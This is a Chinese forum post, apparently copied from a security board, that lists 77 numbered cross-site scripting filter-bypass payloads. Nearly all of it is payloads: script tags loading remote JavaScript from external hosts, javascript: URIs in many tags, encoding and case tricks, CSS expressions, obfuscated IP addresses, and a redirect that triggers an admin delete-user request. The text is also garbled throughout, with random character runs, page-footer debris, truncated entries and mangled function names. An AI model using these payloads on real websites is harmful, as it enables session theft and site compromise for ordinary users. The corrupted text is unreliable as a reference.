貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。; a# T. _0 {* T7 ?; b
(1)普通的XSS JavaScript注入
6 ?2 P1 D+ N& l<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# ^" p* ]1 T; p$ d(2)IMG标签XSS使用JavaScript命令
$ l- N! [- o7 o# u<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) f3 {3 U# c( P* ~1 _
(3)IMG标签无分号无引号
4 ]2 g& c, w& B9 q<IMG SRC=javascript:alert(‘XSS’)>. W& f( E Z6 y/ [
(4)IMG标签大小写不敏感& H% K: l$ l/ }
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: K+ R* [+ c. |7 O( a# G(5)HTML编码(必须有分号)7 {7 O2 ]/ l5 C, e8 r6 k% B, M
<IMG SRC=javascript:alert(“XSS”)>7 F% s- v' C' @2 A7 W5 X1 [ x+ i
(6)修正缺陷IMG标签' y7 u# u3 D m
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>/ F7 j6 E2 D4 q% l
1 M$ k1 z$ Y/ R- ?
& K8 X B& Q! ?, w2 I8 F# _(7)formCharCode标签(计算器): D( |% e, s/ Y& k7 T( z3 c# E7 I
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>6 w: f7 Z5 U8 `$ a
(8)UTF-8的Unicode编码(计算器)
& j; \- k% M1 p( i z3 r/ O<IMG SRC=jav..省略..S')>5 y8 X. a+ w: Z4 t7 M. ^ r
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)# Z1 Y2 j1 V$ z
<IMG SRC=jav..省略..S')>
# a. ~1 u. ]% K8 }(10)十六进制编码也是没有分号(计算器). {1 O* S( m u, E: q5 [: T$ F) s
<IMG SRC=java..省略..XSS')>
4 b7 |( i& b6 Y7 r N2 X8 y(11)嵌入式标签,将Javascript分开
# S% M4 m, d" j; e! ~<IMG SRC=”jav ascript:alert(‘XSS’);”>/ ?9 l% k3 Q4 B1 |8 L
(12)嵌入式编码标签,将Javascript分开9 a U3 |9 B. `! S! F6 h
<IMG SRC=”jav ascript:alert(‘XSS’);”># ~2 V. h# o6 Y c9 h4 |) k! L
(13)嵌入式换行符
- `5 X4 h+ e/ `6 t# Q$ \<IMG SRC=”jav ascript:alert(‘XSS’);”>
# B# c' k, B$ C% v( W) ?(14)嵌入式回车
1 W) p7 o# T) X7 n: J$ K4 D7 N<IMG SRC=”jav ascript:alert(‘XSS’);”>
" t2 q# P9 J8 y& |: }5 |3 W(15)嵌入式多行注入JavaScript,这是XSS极端的例子3 ~% H k9 ?" V3 F3 \; X
<IMG SRC=”javascript:alert(‘XSS‘)”>3 _# `! E6 B- U9 t7 n
(16)解决限制字符(要求同页面)2 {1 x$ h6 X; D9 @- H- y5 m
<script>z=’document.’</script>9 b% k' B# m3 Q4 z4 A+ B I
<script>z=z+’write(“‘</script>
; \. f4 i8 n- ]% v% C" s. e; h/ ^. |<script>z=z+’<script’</script>: } E4 H j' a" M
<script>z=z+’ src=ht’</script>4 @ n! P, \) X5 t! k5 J- |4 t
<script>z=z+’tp://ww’</script>8 W0 b+ N1 N. c
<script>z=z+’w.shell’</script>
3 G9 l$ u1 V+ R4 ~& p6 z0 E" D<script>z=z+’.net/1.’</script>
. u' a) u( O+ O& _: e6 X _+ K<script>z=z+’js></sc’</script>1 I% `" u: c0 d0 ~' z# j ^
<script>z=z+’ript>”)’</script>
, n- @( P, E4 _, I! N$ F/ q4 B4 D0 D<script>eval_r(z)</script>
5 L6 B. V, I: S6 F+ s, S+ G(17)空字符12-7-1 T00LS - Powered by Discuz! Board( s7 {$ a" K6 n; B
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
2 b G7 @1 ^" fperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
3 l5 i! d' Z* X' o3 d6 G4 I9 z(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用( X0 u5 Z- I) A6 g
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
4 b2 Z) {0 U: \2 s/ B3 ^(19)Spaces和meta前的IMG标签
3 T8 l% X: r5 S7 ], ~6 f* p! ^8 ~5 ]<IMG SRC=” javascript:alert(‘XSS’);”>
$ h2 Z$ G' j; B+ K6 S Z(20)Non-alpha-non-digit XSS, Y# j4 _, B" w3 o. ^9 I9 R
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT># T# t0 b0 c1 c
(21)Non-alpha-non-digit XSS to 2
$ \$ }; \. n+ L. r1 m1 i' w<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)># h- e) r c0 J9 R7 y7 O3 {$ Z8 w6 o
(22)Non-alpha-non-digit XSS to 35 R r5 i. b. ?
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>! L3 ~5 X1 x# o: W
(23)双开括号$ f* v0 S9 o t
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
* w3 O1 Q$ f# c+ P9 M$ [8 T3 [(24)无结束脚本标记(仅火狐等浏览器)
' P# v2 b7 S% h5 j. p9 D, e& X<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 u, h5 Y6 J) z: |, w
(25)无结束脚本标记2
' l: s, J$ I" L0 Q6 C5 `" P<SCRIPT SRC=//3w.org/XSS/xss.js>
6 L8 [ x L0 U. I9 I1 c3 \(26)半开的HTML/JavaScript XSS
0 M) E9 l" P% f<IMG SRC=”javascript:alert(‘XSS’)”4 d; w% P' P' {1 s, G, r
(27)双开角括号
5 ?8 m( H+ a& l* g8 B<iframe src=http://3w.org/XSS.html <- j5 `# N( Y. t& w
(28)无单引号 双引号 分号, |3 y7 `0 F4 M/ a2 `$ _
<SCRIPT>a=/XSS/: b4 P$ w- }8 I% M
alert(a.source)</SCRIPT>
! l6 f- P q9 ~: D+ x' K/ i(29)换码过滤的JavaScript' ?- J5 e# n+ P# }
\”;alert(‘XSS’);//; ~# L) h( p3 Y) L
(30)结束Title标签. y( g+ P, Q" |; R1 r6 _
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>( q n8 a7 r- t* B4 @/ x
(31)Input Image
. K& U: X1 g7 V<INPUT SRC=”javascript:alert(‘XSS’);”>: E& k" _1 S5 n) K; i. D3 S" Z5 ]& T
(32)BODY Image T" n. T( @+ Z( Y6 p; K. u; G% }
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 [1 _' X+ W3 b1 e9 |$ ]
(33)BODY标签4 b9 q0 O* `, s% K' S5 t+ h& B
<BODY(‘XSS’)>
+ |( ]5 B! @/ I9 f1 u5 {8 _- ~(34)IMG Dynsrc
& g O2 I% Q" X; d<IMG DYNSRC=”javascript:alert(‘XSS’)”>
: k8 F0 c/ C5 w# I" y$ q; ?(35)IMG Lowsrc; v5 t8 t5 t( m; \
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
( s& n% J* J | M: H( C(36)BGSOUND
: Z5 ?2 G+ v, V<BGSOUND SRC=”javascript:alert(‘XSS’);”>
9 M2 \. N4 ]7 h& ](37)STYLE sheet7 e' d# f* Z, v+ b" G
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ r9 I( u( Q- z1 J" b
(38)远程样式表
& G0 l0 `4 Y. L0 L. A$ k<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! g5 L+ j# z }; j# N0 f
(39)List-style-image(列表式)
8 v8 N8 }1 h, [" t<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS7 M% k" y+ R" a( ] R* ~1 V1 N
(40)IMG VBscript: X- f% v2 d1 Y* a, N( c
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
' n( P6 I8 D- M6 [# N! J$ B, Y(41)META链接url
' R( }' h) b4 v; T+ |2 G: Y( ?5 |9 @3 q5 ^, m0 A( F* @
, A1 y/ h2 ?0 s, l$ ?( U
<META HTTP-EQUIV=”refresh” CONTENT=”0;
5 w& S( D- z' t" YURL=http://;URL=javascript:alert(‘XSS’);”>% Q4 f7 D1 P" I4 O U# t
(42)Iframe
; X+ L( v$ D/ h) a ^. ^/ o& E<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
1 \; F8 O' V; T9 u6 t8 O% Z7 |(43)Frame
- s2 U$ C6 y& |<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board% O- W1 R5 K8 ?
https://www.t00ls.net/viewthread ... table&tid=15267 3/6# k, V" a: u% A5 J
(44)Table3 ?; M5 ~4 i ]& j' H" J
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
; l/ u% b( w8 T6 m(45)TD9 _6 \! v# q/ q4 w X7 _& n
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>2 ^ b& w. u& I7 f
(46)DIV background-image0 {1 i$ b4 Q$ b1 ]! j) ]6 k
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 b7 q |4 i$ u) F: R(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8 x8 y% Q6 L* p1 Q0 w; w
8&13&12288&65279)9 ^$ K: P) T1 F K4 b
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
?' z/ T* G3 v) T2 g' q(48)DIV expression
2 M4 Y( B0 B& ]7 E7 P<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ l: w; c5 i) U6 m(49)STYLE属性分拆表达
- c8 f+ u1 z5 K<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ l6 }# I" @( E2 M
(50)匿名STYLE(组成:开角号和一个字母开头)5 g1 ~, b3 l O) \) r! E
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>! @" n" I! t% S
(51)STYLE background-image5 J' R- m& \% ~/ f
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A; s6 X5 [- R2 ~! W) f, C
CLASS=XSS></A>, K+ p. {, r* }. z
(52)IMG STYLE方式4 S" `8 m. [, U
exppression(alert(“XSS”))’>0 t; G* v% F5 j8 }/ d, m
(53)STYLE background8 P' X" K: w' h) u* D( S' t8 w* @3 Q
<STYLE><STYLE
' b2 @/ C5 `* ]* K" ]type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>4 u' |) q: B3 I3 w. G
(54)BASE
4 l1 w# q U, n. G<BASE HREF=”javascript:alert(‘XSS’);//”>* v) y$ ?* [% Y2 M( I
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS# Q$ x( V" M0 x& L0 O! F/ f
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
! R, C4 s8 h( v8 r/ V' X(56)在flash中使用ActionScrpt可以混进你XSS的代码2 f' O# I8 g: ]4 U
a=”get”;
9 i' Q) O" z6 Z) x" db=”URL(\”";" g8 i6 ^' R6 R' T. J/ k' K
c=”javascript:”;/ F; r9 ?" J3 w; G# ^( f
d=”alert(‘XSS’);\”)”;
( |9 X* `/ E6 E/ h* reval_r(a+b+c+d);5 n& P7 |4 G1 Y9 F
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
0 R/ N8 U. k+ R) a( ^2 c<HTML xmlns:xss>$ W L( t- G: r/ Y( f' Y
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>: U. C% V3 Y# x# E
<xss:xss>XSS</xss:xss>
# U! n, ^, ], [0 Y/ `' r/ E! ^</HTML>
- G$ B/ l- }! _. W" G; t(58)如果过滤了你的JS你可以在图片里添加JS代码来利用8 @' |' E( R; ?/ ?
<SCRIPT SRC=””></SCRIPT>
+ f+ i" v/ l* a0 @8 U, z(59)IMG嵌入式命令,可执行任意命令/ }2 n0 h6 {7 A8 @
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
$ g8 J) k8 x+ y" c+ P(60)IMG嵌入式命令(a.jpg在同服务器)
3 Y- g& s( h( {# K" ARedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser. r5 ?, M2 f& V7 t
(61)绕符号过滤
3 N' S' C( O, j' W<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
% h' v3 @" t/ G. N/ ~) t y(62)' Z4 K7 Q' p2 n
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 c/ d( w) M a" O8 z(63)$ X& u) E3 M6 H1 P8 }0 o& s
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 h; P0 t0 ^- J S+ _- V
(64)
& M" M& ^, d, J$ A( Q q<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>- D* v: P" G+ e! U0 R; r2 h" X
(65)% x( p# u3 e, n3 a! g8 v( E% \9 O7 _2 s
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>. P5 S! r+ T, a, }! F3 u6 J3 P6 Z
(66)12-7-1 T00LS - Powered by Discuz! Board
' |8 w+ s- Q# \6 v% xhttps://www.t00ls.net/viewthread ... table&tid=15267 4/60 Q. Z' W5 E/ Y- r9 y
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 w% ^, u! z& S! `: H(67)$ X3 s7 X8 z o
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>4 D/ z3 {, K$ s/ d
</SCRIPT>
$ s- i& S8 Q5 {( D(68)URL绕行
* I+ M# q+ A9 e5 V& J<A HREF=”http://127.0.0.1/”>XSS</A>
5 ]) F4 K3 G# W0 j: ?4 P$ q; g, {(69)URL编码
" m# o+ x; ^; H! r3 D/ a<A HREF=”http://3w.org”>XSS</A>
$ c9 j3 X) x$ ](70)IP十进制& e8 @6 A0 r( T
<A HREF=”http://3232235521″>XSS</A>- {9 [1 y3 a' ^1 q. t* q! @
(71)IP十六进制. A1 @* p( c+ a$ S( M' u" K
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
5 s- z) i, H* ~3 q& B(72)IP八进制
& |" ]2 D3 V+ Y<A HREF=”http://0300.0250.0000.0001″>XSS</A>; g* [3 X& r: g4 v: [! c% E4 t6 Y6 ?
(73)混合编码. K8 x4 p+ R2 F( R1 T$ H5 A
<A HREF=”h1 g7 }$ m1 m$ w- {
tt p://6 6.000146.0×7.147/”">XSS</A>
4 C' @; |8 |" J# @2 D7 m H7 C(74)节省[http:]
0 A: P) R1 ?5 U9 _' s<A HREF=”//www.google.com/”>XSS</A>
8 c4 e) ~6 \$ o1 ^( a! A3 q0 {(75)节省[www]
5 |4 I& @$ P, ?2 l9 c<A HREF=”http://google.com/”>XSS</A>) E1 T) Z |0 e9 M7 y% _8 s
(76)绝对点绝对DNS! x0 o1 y& f. } x+ |/ G
<A HREF=”http://www.google.com./”>XSS</A>' k/ }! g$ ~& S2 ]; W0 ] |8 W
(77)javascript链接
~1 D8 j$ S$ ?1 U$ ^; w5 i<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>/ k# w3 a: m7 O+ m" n5 e& z( N
/ {" c7 N7 n% U7 {原文地址:http://fuzzexp.org/u/0day/?p=145 m4 j7 R# X) D% ] ^3 u# d- u/ u4 c
$ k) L' E$ Q1 q" g+ U% V |
发表于 2013-4-19 19:22:37
收藏
支持
反对